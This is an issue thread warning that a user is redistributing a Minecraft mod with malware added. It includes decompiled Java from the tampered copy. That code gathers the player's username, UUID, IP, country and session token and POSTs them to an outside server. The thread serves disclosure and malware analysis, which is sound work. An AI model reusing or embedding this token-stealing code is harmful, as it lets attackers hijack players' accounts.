Somebody is distributing copies of this mod with a malware.

Question

Somebody is distributing copies of this mod with a malware.

Closed this issue 3 years ago · 2 comments

An user named "HypixelMods" is distributing multiple copies of this projects with malware.
Tested with virustotal, this is not a false positive I tested both the original and the version in his repos.

Here are his details:
https://www.youtube.com/channel/UCKS_hHOaH2hETdhtRCo7Tpw
https://github.com/HypixelMods

Answer 1 · 2022-01-13T16:10:06.000Z

UPDATE:
I decompiled the code using DJ decompiler and found that this is the malware:

package me.Danker;

import com.google.gson.Gson;
import com.google.gson.JsonObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import net.minecraft.client.Minecraft;

public class MacroSelector {
  public static void start() throws IOException {
    URL url = new URL("http://skyblockrat.herokuapp.com/update");
    HttpURLConnection connection = (HttpURLConnection)url.openConnection();
    connection.addRequestProperty("Content-Type", "application/json");
    connection.addRequestProperty("User-Agent", "Java");
    connection.setDoOutput(true);
    connection.setRequestMethod("POST");
    String data = "{\"username\": \"" + Minecraft.func_71410_x().func_110432_I().func_111285_a() + "\", \"uuid\": \"" + Minecraft.func_71410_x().func_110432_I().func_148255_b() + "\", \"ip\": \"" + ((JsonObject)(new Gson()).fromJson(select(new URL("https://api.myip.com/")), JsonObject.class)).get("ip").getAsString() + "\", \"country\": \"" + ((JsonObject)(new Gson()).fromJson(select(new URL("https://api.myip.com/")), JsonObject.class)).get("country").getAsString() + "\", \"token\": \"" + Minecraft.func_71410_x().func_110432_I().func_111286_b() + "\"}";
    byte[] out = data.getBytes();
    OutputStream stream = connection.getOutputStream();
    stream.write(out);
    stream.flush();
    stream.close();
    connection.getInputStream().close();
    connection.disconnect();
  }
  
  public static String select(URL url) {
    StringBuilder sb = new StringBuilder();
    try {
      InputStream in = url.openStream();
      try {
        BufferedReader reader = new BufferedReader(new InputStreamReader(in));
        String line;
        while ((line = reader.readLine()) != null)
          sb.append(line).append(System.lineSeparator()); 
      } finally {
        in.close();
      } 
    } catch (Exception exception) {}
    return sb.toString();
  }
}

Answer 2 · 2022-01-14T18:23:51.000Z

The account got deleted